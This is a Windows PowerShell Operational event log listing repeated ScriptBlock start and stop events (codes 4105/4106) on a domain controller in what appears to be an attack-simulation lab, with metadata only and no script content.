Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473745
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473744
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473743
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473742
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473741
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473740
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473739
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473738
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473737
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473736
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473735
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473734
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473733
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473732
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473731
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473730
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473729
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473728
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473727
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473726
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473725
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473724
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473723
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473722
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473721
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473720
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473719
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473718
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473717
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473716
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473715
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473714
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473713
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473712
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473711
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473710
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473709
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473708
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473707
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473706
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473705
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473704
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473703
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473702
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473701
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473700
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473699
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473698
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473697
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473696
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473695
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473694
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473693
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473692
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
